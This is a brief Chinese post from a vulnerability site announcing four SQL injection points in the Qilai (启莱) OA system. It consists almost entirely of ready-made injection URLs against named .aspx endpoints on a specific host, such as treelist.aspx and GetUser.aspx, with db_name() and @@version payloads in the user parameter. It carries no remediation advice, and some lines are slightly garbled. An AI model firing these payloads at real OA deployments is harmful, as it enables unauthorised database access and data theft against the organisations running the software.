漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

启莱OA系统sql注入4处

注入一
访问
http://test.oawin.net:5656/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1
1
注入二
访问
http://test.oawin.net:5656/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1
1
注入三
访问
http://test.oawin.net:5656/client/GetUser.aspx?user=' and @@version>0--
1
注入四
访问
http://test.oawin.net:5656/client/CloseMsg.aspx?user=' and @@version>0--&1

1pwd=a

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » 启莱OA系统sql注入4处

评论